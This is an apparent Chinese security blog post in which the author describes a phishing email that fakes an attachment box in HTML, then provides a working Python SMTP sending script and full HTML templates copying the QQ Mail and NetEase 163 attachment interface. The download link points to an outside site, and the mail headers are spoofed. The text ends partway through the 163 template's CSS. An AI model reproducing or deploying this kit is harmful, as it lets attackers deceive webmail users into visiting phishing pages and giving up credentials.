钓鱼事件应急
然后下载附件需要仿造了一个登录界面:
开始我以为是一个网易的存储型XSS漏洞,心想应急还能捡到个洞?
后来分析发现,邮件支持发送html,附件的下载并不是真的有附件,而是html渲染的效果,然后将下载链接重定向到了钓鱼网站。
emm,以后钓鱼也可以用了。
邮件钓鱼新思路
先看图:
QQ邮箱:
网易163邮箱:
上代码: 代码没有做武器化,只是验证思路的demo,自用自改吧。
修改位置: username、password 、msg["From"] 参数为你的发信邮箱信息
msg["To"] 参数为 “鱼儿”邮箱地址
msg["Subject"] = Header("这是邮件主题", "GBK").encode() 邮件主题自己设计一下
with open('qqmail.txt','r+') as file: 第31行,如果给qq用户发,则用qqmail.txt,如果给163用户发,就用163mail.txt。手动修改
'''
Author: AdminTony
Date: 2024-11-06 15:37:56
LastEditTime: 2024-11-06 17:23:44
LastEditors: AdminTony
'''
import smtplib
import base64
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.header import Header
# 邮件配置
smtp_server = "smtp.126.com" # 发件服务器(例如126邮箱)
smtp_port = 465 # 通常使用465端口进行SSL加密连接
username = "admin@126.com" # 你的邮箱地址
password = "nidemima" # 你的邮箱SMTP服务密码(部分邮箱需要单独生成授权码)
# 构造邮件
msg = MIMEMultipart("alternative")
msg["From"] = "admin@126.com"
msg["To"] = "admin@qq.com"
msg["Subject"] = Header("这是邮件主题", "GBK").encode() # 设置主题并编码为GBK
# 添加自定义头信息
msg["X-Priority"] = "3"
msg["X-Mailer"] = "Coremail Webmail Server"
msg["X-Originating-IP"] = "[114.36.36.164]"
with open('qqmail.txt','r+') as file:
html_content = file.read()
text_content = "文本内容"
# html_content = "<div>这是测试邮件的HTML内容。</div>"
# Base64编码邮件内容
print(html_content)
text_part = MIMEText(base64.b64encode(text_content.encode("GBK")).decode(), "plain", "GBK")
html_part = MIMEText(html_content.encode("GBK"), "html", "GBK")
# 添加内容到邮件
msg.attach(text_part)
msg.attach(html_part)
# 发送邮件
try:
with smtplib.SMTP_SSL(smtp_server, smtp_port) as server:
server.login(username, password)
server.sendmail(username, msg["To"], msg.as_string())
print("邮件发送成功!")
except Exception as e:
print("邮件发送失败:", e)
qqmail.txt 内容:
<div id="isForwardContent">
<br>
<a data-auto-link="1" href=""></a>
<br>
<br>
<a data-auto-link="1" href=""></a>
<br>
<br>
<div data-ntes="ntes_mail_body_root" style="line-height:1.7;color:#000000;font-size:14px;font-family:Arial">
<p>
<br>
</p>
</div>
</div>
<div id="attachment" a="" b="false" style="padding:2px;" class="attbg" ui-type="attCon">
<div style="padding:6px 10px 10px 8px;" class="txt_left">
<div style="height:14px;">
<!--<a class="right" style="padding-top:1px;" href="javascript:;" ck="previewAttach" select=""><img lay-src="https://rescdn.qqmail.com/zh_CN/htmledition/images/spacer1e9c5d.gif" class="ico_preview" />附件预览</a> -->
<b style="font-size:14px;">
<img lay-src="https://rescdn.qqmail.com/zh_CN/htmledition/images/spacer1e9c5d.gif" align="absmiddle" class="ico_att showattch" border="0" style="margin:-3px 2px 0 0;">附件</b>(<span id="attachmentCount">1</span> 个)
<!-- -->
</div>
</div>
<div style="padding:0 8px 6px 12px;background:#fff;_height:60px;line-height:140%;">
<div class="graytext clear" style="padding-top:12px; padding-bottom:5px">
<span style="color:#000;font-weight:bold;font-size:12px;">普通附件</span>
<span id="span_ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb_safe"> (<span class="ico_Avira"></span>已通过电脑管家云查杀引擎扫描)</span>
<script type="text/javascript">
getTop().LogKV({ sValue: 'readmail|attachment|safebar|show', vSample: 0.01 })
</script>
</div>
<div class="att_bt attachitem">
<div class="ico_big">
<a id="AttachIconAZL0006_b5DNJ6qMsQUuY2cAgiBmEeb0" attach="1" attid="反馈意见.rar" viewmode="compress" downloadurl="/attach/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&fileid=ZF0006_b5DNJ6qMsQUuY2cAxy1mZeb&name=%E5%8F%8D%E9%A6%88%E6%84%8F%E8%A7%81.rar" mailid="ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb" url="/cgi-bin/viewcompress?sid=F_jSUt-A9kJpExdw&cpsfile=%B7%B4%C0%A1%D2%E2%BC%FB.rar&mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&action=list&t=cps.json&fromattach=1" ck="previewAttach2" downloadfilename="57548d160f4158c365d1a227fe43df0a" idx="0" filename="反馈意见.rar" down="/cgi-bin/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&filename=%B7%B4%C0%A1%D2%E2%BC%FB.rar&sid=F_jSUt-A9kJpExdw" iconurl="/zh_CN/htmledition/images/xdisk/ico_mid/fu_rar.gif" filebyte="45584825" sparse2onlinedocurl="">
<img style="width:auto;" lay-src="/zh_CN/htmledition/images/xdisk/ico_mid/fu_rar.gif">
</a>
</div>
<div class="name_big">
<span player="/cgi-bin/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&filename=%B7%B4%C0%A1%D2%E2%BC%FB.rar&sid=F_jSUt-A9kJpExdw">反馈意见.rar</span>
<span class="graytext"> (43.47M<span id="span_attachIndex_ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb_ebc3798a5b667ed2c386923c34176c67" style="display:none">, <span style="color: #C00;">附件包含病毒,请勿下载打开
<input type="button" class="qm_conversation_input_info" mor="showPoisonWaring" mot="hidePoisonWaring" style="cursor:pointer;vertical-align:-4px;">
</span>
</span>)</span>
<div class="down_big">
<a href="javascript:;" ck="previewAttach" downloadurl="/attach/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&fileid=ZF0006_b5DNJ6qMsQUuY2cAxy1mZeb&name=%E5%8F%8D%E9%A6%88%E6%84%8F%E8%A7%81.rar" mailid="ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb" select="1" downloadfilename="57548d160f4158c365d1a227fe43df0a" sparse2onlinedocurl="" down="/cgi-bin/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&filename=%B7%B4%C0%A1%D2%E2%BC%FB.rar&sid=F_jSUt-A9kJpExdw">预览</a> <a title="请直接点击或鼠标右键转下载工具打开,请不要拖拽到下载工具悬浮框中" href="https://www.admintony.com" test="" unset="true">下载</a> <a style="" href="javascript:;" flag="0" class="needSetFlag" attachkey="ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb|%B7%B4%C0%A1%D2%E2%BC%FB.rar|%B7%B4%C0%A1%D2%E2%BC%FB.rar|45584825" onclick="var dom=this;getTop().attachSetFlag('ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb|%B7%B4%C0%A1%D2%E2%BC%FB.rar|%B7%B4%C0%A1%D2%E2%BC%FB.rar|45584825',true,function(){getTop().attr(dom,'flag','1');getTop().show(dom,false);getTop().show(dom.nextSibling,true);})">
<span>收藏</span>
</a>
<span style="display:none;" class="graytext">
<span>已收藏, </span>
<a href="javascript:;" onclick="getTop().jumpToAttachFlag('ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb','%B7%B4%C0%A1%D2%E2%BC%FB.rar')">查看</a>
</span><!-- <a ui-type="netdiskBind" attid="ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb|ebc3798a5b667ed2c386923c34176c67|%B7%B4%C0%A1%D2%E2%BC%FB.rar" onclick="getTop().QMNetDisk.upload(this);" class="netdisk_hide"><span >转存</span><span class="bind_down_icon"></span></a> -->
<!-- TODO: 翻译 -->
</div>
</div>
</div>
</div>
</div>163mail.txt的内容:
<div id="isForwardContent"><br><a data-auto-link="1" href=""></a><br><br><a data-auto-link="1" href=""></a><br><br><div data-ntes="ntes_mail_body_root" style="line-height:1.7;color:#000000;font-size:14px;font-family:Arial"><p><br></p></div></div>
<style>
:root {
--color-theme-1: #F1F7FE;
--color-theme-2: #EDF3FF;
--color-theme-3: #B4CEFB;
--color-theme-4: #8FB1F9;
--color-theme-5: #6993F7;
--color-theme-6: #3370ff;
--color-theme-7: #2f54d1;
--color-theme-8: #1c39ac;
--color-theme-9: #0F2486;
--color-theme-10: #071762;
--color-grey9: #fff;
--color-grey8: #F5F6F7;
--color-grey7: #EFF1F5;
--color-grey6: #E3E5EC;
--color-grey5: #B7BCC7;
--color-grey4: #9095A2;
--color-grey3: #585E6D;
--color-grey2: #394051;
--color-grey1: #21293A;
--color-danger: #EC4444;
--color-warning: #F5891D;
--color-safe: #14B360;
--color-tips: #FFFCDD;
--color-info: #3370FF;
--font-size-footnote: 12px;
--font-size-primary: 14px;
--font-size-body: 16px;
--font-size-head: 20px;
--font-size-title: 28px;
--font-size-big-title: 28px;
--font-weight-semibold: 600;
--font-weight-bold: 500;
--font-weight-normal: 400;
--color-h5-theme-1: #F1F7FE;
--color-h5-theme-2: #EDF3FF;
--color-h5-theme-3: #B4CEFB;
--color-h5-theme-4: #8FB1F9;
--color-h5-theme-5: #6993F7;
--color-h5-theme-6: #3061F2;
--color-h5-theme-7: #2f54d1;
--color-h5-theme-8: #1c39ac;
--color-h5-theme-9: #0F2486;
--color-h5-theme-10: #071762;
--color-h5-grey9: #fff;
--color-h5-grey8: #F5F5F5;
--color-h5-grey7: #EBEBEB;
--color-h5-grey6: #DBDBDB;
--color-h5-grey5: #C0C0C4;
--color-h5-grey4: #89898C;
--color-h5-grey3: #4D4D4D;
--color-h5-grey2: #2C2C2E;
--color-h5-grey1: #21293A;
--color-h5-danger: #FC2D2D;
--color-h5-warning: #F5891D;
--color-h5-safe: #50CD50;
--color-h5-tips: #FFFCDD;
--color-h5-info: #1C83EB;
--font-size-h5-footnote: 13px;
--font-size-h5-primary: 14px;
--font-size-h5-body: 16px;
--font-size-h5-head: 17px;
--font-size-h5-title: 17px;
--font-size-h5-big-title: 20px;
--button-large-height: 40px;
--button-height: 32px;
--button-small-height: 28px;
--button-tiny-height: 24px;
--button-huge-height: 48px;
--button-huge-border-radius: 4px;
--buttonH5-large-font-size: 17px;
--buttonH5-middle-font-size: 14px;
--buttonH5-small-font-size: 12px;
--buttonH5-large-round-border-radius: 10px;
--buttonH5-middle-round-border-radius: 8px;
--buttonH5-small-round-border-radius: 8px;
--buttonH5-primary-bg: var(--color-h5-theme-6);
--buttonH5-primary-active-bg: var(--color-h5-theme-7);
--buttonH5-secondary-bg: var(--color-h5-grey8);
--buttonH5-secondary-active-bg: var(--color-h5-grey7);
--input-large-height: 40px;
--input-middle-height: 32px;
--input-small-height: 28px;
--inputH5-border-color: #E6E6E6;
--inputH5-placeholder-color: var(--color-h5-grey5);
--inputH5-show-plain-btn-color: #C1C1C1;
--inputH5-clear-btn-color: #C3C3C3;
--inputH5-disabled-color: var(--color-h5-grey5);
--inputH5-danger-border-color: red;
--inputH5-border-background: none;
--inputH5-border-border-color: var(--color-h5-grey6);
--inputH5-border-disabled-border-color: var(--color-h5-grey6)
}
.lY0 {
font-size: 12px;
line-height: 1.666;
font-family: Microsoft Yahei, verdana;
color: #21293a;
outline: none;
padding: 10px;
background: -webkit-gradient(linear, 0 0, 0 100%, color-stop(0, #fff), color-stop(1, RGBA(255, 255, 255, 0)));
}
.sz0 {
font-size: 12px;
line-height: 1.666;
font-family: Microsoft Yahei, verdana;
color: #21293a;
outline: none;
border-style: solid;
border-width: 1px;
background: #f5f7fa;
border-radius: 2px;
border-color: #f5f7fa;
}
.tn0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
outline: none;
line-height: normal;
}
.sa0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
outline: none;
padding: 10px 10px 0;
position: relative;
}
.ox0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
outline: none;
}
.nui-ico-bigAtt {
color: #21293a;
display: inline-block;
vertical-align: middle;
font-family: nui !important;
font-size: 12px;
font-style: normal;
line-height: normal !important;
-webkit-font-smoothing: antialiased;
font-weight: 400;
overflow: hidden;
text-align: center;
background: url(/cover?u=dEdPZ2NUUjNsWVN2RFdBdER0L2lFdFRLL0ZkODRDTlhSS1BkMDZ5T1NIMnJtVEJIaHpYaHNnQXdLd2N3TFF1aGZpc0RsS0gyYWFndGhCSzl2YTl5VWR5Y1orVlhsNFcxNTZoRVFHQVd2Tm42SGtOSkE3VjI3YmlNSGlidjZkTXVPRk5BZ1Rhb2pkQjgwTm8wS3FNYTBrNEd6TzNWV1ZrZXdsUUFEamZEdWhiSk1ic09GNXZDdjI4MXFWMXM2THZPeGJmNzlkeXAwRjdhbi9hUFVUVVpuY01DdmxmV1J5RDhpWTRwSTI2UVo0ckJBUGpkMVFLRTBTeE4vMmprZFNaN2F6OE1hWTVPTnpTSndQcE1XT0ExeStXRzNNTnV2cjBBUk80SDl4d0toRkVUT3l2RTZyT0I2Zit5Y3hSRGh6M1RVNGdJVXllVWh6S2pUY2x6bnNWTk1CWEhJU2hjMFRFT0RneStBOTYwTy9JSm1MbFRuRTdNeVFRSG9qdmIyVUxzejI0SUlkNUhya1JhMVRwRHduMVhuY2p1ejBXanVBdk1GQmlQb0owbDVwbE1LS1pLNXg2ajVUTVR1TVppWnJhNW9qQytZZVZiWUhpVURIbjRZM2FScHc9PQ==) no-repeat;
height: 14px !important;
width: 14px !important;
margin-top: -5px;
}
.jU0 {
font-family: Microsoft Yahei, verdana;
color: #21293a;
font-size: 14px;
line-height: 1.1;
margin-left: 4px;
}
.nui-txt-s12 {
font-family: Microsoft Yahei, verdana;
line-height: 1.1;
outline: none;
font-size: 12px !important;
color: #9095a2 !important;
font-weight: normal;
}
.sK0 {
font-family: Microsoft Yahei, verdana;
outline: none;
border-style: solid;
border-width: 0 0 1px;
clear: both;
font-size: 0;
height: 0;
line-height: 0;
overflow: hidden;
color: #e3e5ec;
margin-top: 10px;
}
.rY0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
outline: none;
position: relative;
zoom: 1;
padding: 0 10px;
}
.qs0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
margin: 0;
outline: none;
padding: 0;
list-style: none;
margin-left: 7px;
}
.lh0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
list-style: none;
outline: none;
padding: 0;
border-radius: 3px;
display: inline-block;
height: auto;
margin: 6px 40px 6px 0;
padding-top: 10px;
position: relative;
vertical-align: top;
width: 120px;
}
.lh0:hover {
background-color: #e9eff9;
border-color: #e9eff9;
}
.lh0:hover .ey0 {
display: block;
}
.dM1 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
list-style: none;
outline: none;
height: 4px;
left: 0;
position: absolute;
right: 0;
top: -4px;
}
.ey0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
list-style: none;
outline: none;
background: #fff;
border: 1px solid #e3e5ec;
border-radius: 4px;
bottom: 4px;
box-shadow: 0 4px 16px 0 rgba(0, 0, 0, .08);
color: #21293a;
display: none;
left: -1px;
line-height: normal;
padding: 4px 0;
position: absolute;
width: 258px;
z-index: 3;
}
.ey0 a:hover {
background: #edeeef
}
.dn0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
list-style: none;
color: #21293a;
line-height: normal;
outline: none;
padding: 4px 12px;
}
.cg0 {
font-family: Microsoft Yahei, verdana;
list-style: none;
outline: none;
white-space: normal;
word-break: break-all;
word-wrap: break-word;
color: #585e6d;
font-size: 12px;
line-height: 20px;
}
.gi2 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
list-style: none;
color: #21293a;
line-height: normal;
outline: none;
background: #e3e5ec;
height: 1px;
overflow: hidden;
}
.cK0 {
font-family: Microsoft Yahei, verdana;
list-style: none;
text-decoration: none;
color: #21293a;
display: block;
font-size: 14px;
line-height: 22px;
padding: 5px 12px;
}
.cF2 {
font-family: Microsoft Yahei, verdana;
list-style: none;
color: #21293a;
font-size: 14px;
line-height: 22px;
outline: none;
background: no-repeat 0 3px/16px 16px;
display: block;
padding-left: 28px;
background-image: url(/cover?u=NmVMaWY3Rmc2T1BhN2RKanF5ZzYyYjNGUitrNzFzbVg3ejBrVlFWeVRCZU9OWW0yd1lsdzQ1dTdkQ3pRbmVVaVNwRnlKNzZZUG5mcHlNcXZKdUNBWldrNE5qTVhuL1dpaXlhWjdnbWdlMUlydW5ER2IwbFhBckN5STBXd1ZEKzFqYThNRmdpdEtHMFBjMWtQeVFDdlRJYk41UGF1RUdGVTBDMUcvTEdnZms3VEg3NGdtc003cUNVN3VVMFptVkZEajhXWlladTJNeGtFc2ltTGNkdVJzQkk1akJwOFJsSlZSTWRLVE9VWGRNSmJDTVBjRnk0MndTTlkvZ0ExU3FjSXpOZ0FMQzJvNHgvbzdkOVpvbyt3c3dSVnFIbEhLRlM5a0RURlFOUEVoN05YVDNrZzRiTXVYTm51Z3pJcS9xV1BLS3JhWEJ4a0dNcmsyakxJcHBGQVphZzBmYVk2YXNGNWhCeGNXYWlwRUNlVXhDa1FFeENDOE9qYy9TRU13TW8xRlh6L0syUVAyY0RoYkdoSU9UM01EZXBZYUp3aUc4S3prR0VqRXJTOWRpbTJ5S1dQbDhidVNNajJseHdhQWl4eDBSQy9MOWlFNDJJQjdScWVkOVZJSytrZTNKeTQyaGMzWXVqVmZrYXpVNXFQV2NwK3QvU2xzWTM0QnRJTFF6NFNMZGZMYWVraCtJR1JXWndLU1dpMWhTaVVhQXBUbHFNK2ZHcFhmZktsVmJQN3l4cVVLb0NxTXVobDVrU3hNUThudm5pb3FmZnFtMzF0NXFjaVhoNUlYKy91VG5vR2JWWGdGTWNmbkJNVVdxVG1ZRHAxTEJ6VDh4NjU2MHpQN3QyN3F0bmxOSGZJcVpJRTB5dVNzUlZqVi94SkRVbmlCQ1RHQzd2RHR4RjNOUjN3WUx1eWtZTm0wRFdTWE5TeUpQc1greEV0NERDSC9BOXJ3WFdReU1TT2hsWlNXZGdGcWxPMnRsemxvbHVlWjJlbklobGNqK0RlejU4cHBLdWVtU2xNbEFSYmZuQnpJRGNmSlo5SG4vekJXYVcrL0VLdHFlVnNobUViaXIyMXZwbDM3aFRJSkQ5UmlTMlRYVlIrMUdYTw==);
}
.cf2:hover {
background-color: #e9eff9;
border-color: #e9eff9;
}
.bJ0 {
font-family: Microsoft Yahei, verdana;
list-style: none;
text-decoration: none;
display: block;
font-size: 14px;
line-height: 22px;
padding: 5px 12px;
cursor: default;
opacity: .2;
color: #585e6d;
}
.cc2 {
font-family: Microsoft Yahei, verdana;
list-style: none;
font-size: 14px;
line-height: 22px;
cursor: default;
color: #585e6d;
outline: none;
background: no-repeat 0 3px/16px 16px;
display: block;
padding-left: 28px;
background-image: url(/cover?u=NmVMaWY3Rmc2T1BhN2RKanF5ZzYyYjNGUitrNzFzbVg3ejBrVlFWeVRCZU9OWW0yd1lsdzQ1dTdkQ3pRbmVVaVNwRnlKNzZZUG5mcHlNcXZKdUNBWldrNE5qTVhuL1dpaXlhWjdnbWdlMUlydW5ER2IwbFhBckN5STBXd1ZEKzFqYThNRmdpdEtHMFBjMWtQeVFDdlRJYk41UGF1RUdGVTBDMUcvTEdnZms3VEg3NGdtc003cUNVN3VVMFptVkZEajhXWlladTJNeGtFc2ltTGNkdVJzQkk1akJwOFJsSlZSTWRLVE9VWGRNS3NnWUluYm5aMTFFVGtWVjNjNlYzMnptNHdXUU8zQXdSZWJFdTRVb29FSUhMYkdNR1EzN0xnbENjMzNoZ0N5dGdRZXZFamFINXV5ejFHalkxRzcyT0E0blFVUjRuK2ZBVzRrMWVuUTMyMUtPakk5bmlrZjBpYXdYWVpsdDRIR2M4OGphOURxSEYweld5LzB3c2FkNkRtTnhFSnNuWklwUExRT0lPY3NZU3BHdFpDcVJLR2J5T1pveTZEemgwdjh2ZVVkNkFBc2pMY1hpRU44ZnNDZ1VOa2JFYUFCUTFLZk1hdVFhMlNMOENjMXBEQ2VwQ2ZHSlYrN1hnRmhTMXdnbFlLRnJYMDRaRkpFKzhrSEhXNTg5Y2dQajN5N0g1NnRpYVdwTmpEbXNjS2JFcDdWcG4zeHBwTzlmQk5SKzgxU0piTmN6WGZucVMzSmtQbUh5M1B6eHhKeDdRd1U5QjY4bUZ4WVhocWJDSVR2V09CaHhYWXR0ZWpscU91UG5nTi9RR0FobjJ6RS9LRCtON0NjV2FxMExwOFRNcXgzcUszVzJ3WTZvWk9YK0JUaUVzeFBYZW9ONjFHOUdWZmhjUDVZakp3VGlXcUZwZlFzOUN2RnZ5eWVSS0tocjNEMGJvNXpUQ25Vd2E4bjlBQWdPcG80R3FtSVFEcERlQnRyRXhTWGpqaUhYcTJBTy9RenUvV05sSWlvTXZieS8ydDVVU3NCRG1rMWtGdlNuVkFBRVlRR1VzN1o4UnRJUnRMOTBWMjByWThnek1nQkluQWlxYTlxMVVkTjFZSkx2bURwVGJ5aW00L2x0dFFnOVk2K0NqTUtaaFlXVm5kMEFQVmp3V2srMUg5ZTIreEFlVHU3TVp0ajZHTHBqc1k0aC9UVFV1OUdMakJmTnBZR3VtNm0wa2dPUDZ0anhDU3ZUSEpPZVE3dXJqQ2VGTlhJRXVCb0UwMFV4UzljYmdOZTdpOWJ6dkhteHgzMUhTU2kwWU1na1E1bFkxM29yRFIxdW82bGFXZUdzMzE0ang2T1FPUXc3SmVWWHZ4aUlobGdFeitVeGdSMURCSmRnUUlTUFQvT0sxSW5ybUt1QU1SWVNGRGxJOFM4Y1U1dFczeVRCQU5RWWIyQmNxR1d6OEZ0eGxYYUlPbFBDUDdNL0xxNUJJNGtiTlZqYWl5eWVqc2ZLRGo2RGRRK2xOd2Q0V1gzaktxTnI4VEYxclN1NjVqL1krZEZ5N2YrcHlVOXE0WGVHWDlNeFFwNm8vRWJhSWJnWWQycmJnQ0R2MUVCU3REcUNQV0twUHVsTFA5emcvNjlkY2VBMmxWUG5waTBMY1FZa00rU1dTWUZlQ3VTaHhwdkg2UW90Vlg1bFVORnZ4YzFXV2diMG9xaUc0MFBrdk5vc2RvS1lnNlpRT0RiQWNYUTJyRXYxeHdEOW1DQitTYWd3SVFZaVErc1BIMjVKeGMwdDdoQkNQVUdha3YrM1phRkZrK2hYbkxlcUUxZVphbXZWVk1iYUNjdTlha0I5UHB0bmpaYU80TWhTUGUrZ0JBajVCRi9NM1lkMFdjcnNUMzcySWhUbWMzZkdpOTBDbjB3blZLTVYzMWFtK1FzQjEzbmxFbHRweTgxUlFQYjhDUksybXRadFk0RTBCVDdYaTZMUGxBM05TdnpGdnNPS3psTnEyL05HdXFoOEJqeHMySm1jOXRCUjY0MmErSXFsOTdXWEVvWW82QUo1L2d0MU9TdUpBa2JVRTFPOWIrUlZ4bDRiQ2I1cjJYeE1sOUNtMkp0RS9iQUx1cVpvND0=);
}
.cb1 {
font-family: Microsoft Yahei, verdana;
list-style: none;
color: #21293a;
font-size: 14px;
line-height: 22px;
outline: none;
background: no-repeat 0 3px/16px 16px;
display: block;
padding-left: 28px;
background-image: url(/cover?u=NmVMaWY3Rmc2T1BhN2RKanF5ZzYyYjNGUitrNzFzbVg3ejBrVlFWeVRCZU9OWW0yd1lsdzQ1dTdkQ3pRbmVVaVNwRnlKNzZZUG5mcHlNcXZKdUNBWldrNE5qTVhuL1dpaXlhWjdnbWdlMUlydW5ER2IwbFhBckN5STBXd1ZEKzFqYThNRmdpdEtHMFBjMWtQeVFDdlRJYk41UGF1RUdGVTBDMUcvTEdnZms3VEg3NGdtc003cUNVN3VVMFptVkZEajhXWlladTJNeGtFc2ltTGNkdVJzQkk1akJwOFJsSlZSTWRLVE9VWGRNS1l6Sk85NFErWVkrVW9HYU1BWDFMbENXV0svSGhZbjJ6UzIrS3JsSm5UZUNhUFRFT2xGNFFkSld1YXlxdUZveXlWY1FqcHZxMHFhS01pWGRTTlZTMCtqRVJoZTVHTHlrTU5aRG5kdTZMZXZIRm0zWCszc2tkTmdIVWxxZzM2Y1Z1RXlnNGNMK0RvMUQ3cGxPWjhRWlRva294WFRRcm5hWUpXbFdaWWN6ZnBhWlcvMWNOc1FUYU4vb3M0UUltMFdsU0hncjRZakdMemNUQkFvM0IxaFBwYUxqRTFIRmVia1I2R0FuRGpHbDdNYTV2Q0pFNlZoUitnQzBBNGMzVC91V1gvalJxLzdrZExUQy9seDdlam11Zm1NeVN1czNkYnRVWjBEY0U2WHQ1YnA5NG5KZS9nN2pKdkN4aUd2TGxNNG83eUM2K24rRnFXL1E0VTVxenJjZWJJVGl1UzE2ekdoUTdYVGZlY3FaOW1CTjN1RFhsd0NuMWRVSGE2WmkzRllVcDczOFkycDdXa296bmdsei91OStMbXVjNFRuN0hvWHB1dVVIQzQ0Tk0rTUVibzdNbWNXdDdxUzJuamYwb0JvYXc3U2lyUDdKeHVGbS9LRmsrVDBDd210SnRxWDdUNTQ1MCtBZ1VDTzk5WTF2WkhBRFVTU3NNcVpHa3JiUGRiWWpXYnJjdHJ2c292TGtNRC94Z1BBdllmRXpqeVJVYWg2MzlPQXd6aG1FTzZleFNVd0l1NXBKTGpLMEQvYkswdkdtN1luQTJvbDFzYjdmQWN4TFp1RTIwME0zc3FMNGltTHpXS3VxVGRxbUI3d2ZRWUwzRFN5aHNNVjRzbklHRVE3bDVZVmVvVTRnQXFlMkdTMGNjMjI1MUphTHRtNXNvYmY2YStBL3JCaWFmQm8vZFpKS0FLa0pZY25vTEZjbUpoSGdVc2ZSNVBwQ05BUU9jVTVNVVBINEMveGoydUcyU3YxTWt0SlJNa21EcHIwMHRzSkp2QVNvUkxYTkpHUHlya1hSTlJ2d0RZWlg4RFRmYXl0dmwxSjZHbVcwekVGTk15VTdpT1FpVnFtU0N1ZFoxU2krazU3QU9yZEcvV0JVWGlNbDFnWFJNaEJoK2Q4UVkwUU5US3VjNW9hVnNmcWl4RzA1NWNDNTVlaFBaSjVheFRON0FDQ2lReWt5eXoySjE0WTJNQkllMkc0OE9nM3lPKzhQTU1VU3RTcHBpN251YXZ0RXliV0lTSjFWTEwrVzJUczIzdDFGaEJTanp4ZVFXaW9KSGVwejNEYkxrdnBJM3FpTDdtUnE4Unh5TnJELzBsOSsrWVVHaW1Zb2lZU0pUSUs5bXFueGltOUtLN2NJUFhiOWllUTJQTFJYU3NDSzRlN2xRa2FQb251MHp4SnJOTy9ha1R4cDdiUnhqSmpTRlpJUjR6QUczZ2JBMTdQajFuUHIvRm4vbldYRThxRWxkbTlOV2xxZElEbkdySGJicWF5elVJTXVQVFFsY0RDS1crL0VLdHFlVnNobUViaXIyMXZwbDM3aFRJSkQ5UmlTMlRYVlIrMUdYTw==);
}
.v1 {
font-family: Microsoft Yahei, verdana;
list-style: none;
outline: none;
color: #585e6d;
float: right;
font-size: 12px;
line-height: 20px;
padding-top: 1px;
}
.v2 {
font-family: Microsoft Yahei, verdana;
list-style: none;
outline: none;
color: #9095a2;
display: block;
font-size: 12px;
line-height: 20px;
}
.eG0 {
color: #21293a;
list-style: none;
font-family: inherit;
border-collapse: collapse;
border-spacing: 0;
margin: 0;
outline: none;
border: 0;
font-size: 0;
line-height: 0;
padding: 0;
text-align: center;
width: 100px;
height: 100px;
vertical-align: middle;
}
.cf0 {
color: #21293a;
list-style: none;
font-family: inherit;
border-collapse: collapse;
border-spacing: 0;
font-size: 0;
line-height: 0;
text-align: center;
outline: none;
max-height: 100px;
overflow: hidden;
width: 100px;
}
.nui-ico-file75-6 {
color: #21293a;
list-style: none;
border-collapse: collapse;
border-spacing: 0;
display: inline-block;
vertical-align: middle;
font-family: nui !important;
font-size: 12px;
font-style: normal;
line-height: normal !important;
-webkit-font-smoothing: antialiased;
font-weight: 400;
overflow: hidden;
text-align: center;
background-image: url(/cover?u=VzczRm1Tb0dabjJMVXYzeEwwL1pwODMvMGdrRjJaZ2VIWXZzVjZ0K2RUMWRwZVdaY21UQXo4TXVFbXNWWDIyc29pbHVWQTRiQkxwa3g5MlpjVEw0ajFLRDRLTFVxbjVsL3lqWTZtRFV4WWs9);
background-repeat: no-repeat;
height: 75px;
width: 75px;
background-position: -375px -144px;
}
.gx0 {
color: #21293a;
line-height: normal;
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
margin: 0;
outline: none;
padding: 0;
border: 0;
height: auto;
vertical-align: top;
}
.dh0 {
line-height: normal;
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
font-weight: 400 !important;
overflow: hidden;
padding-top: 6px;
text-overflow: ellipsis;
white-space: nowrap;
display: block;
margin-bottom: 6px;
text-align: center;
width: 100px;
color: #21293a;
font-size: 12px;
}
.di0 {
line-height: normal;
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
outline: none;
display: block;
margin-bottom: 6px;
text-align: center;
width: 100px;
color: #9095a2 !important;
font-size: 12px;
}
.el0 {
color: #21293a;
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
outline: none;
line-height: 1.66;
padding-bottom: 6px;
text-align: center;
}
.cy0 {
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
line-height: 1.66;
text-align: center;
outline: none;
color: #9095a2 !important;
font-size: 12px;
}
.gh1 {
list-style: none;
font-family: inherit;
font-size: 100%;
border-collapse: collapse;
border-spacing: 0;
line-height: 1.66;
text-align: center;
outline: none;
padding: 8px 0 0;
color: #9095a2 !important;
}
.nui-split-cDark {
font-family: Microsoft Yahei, verdana;
outline: none;
border-style: solid;
border-width: 0 0 1px;
clear: both;
font-size: 0;
height: 0;
line-height: 0;
overflow: hidden;
color: #e3e5ec;
border-color: #e3e5ec;
margin-top: 10px;
}
.sw0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
outline: none;
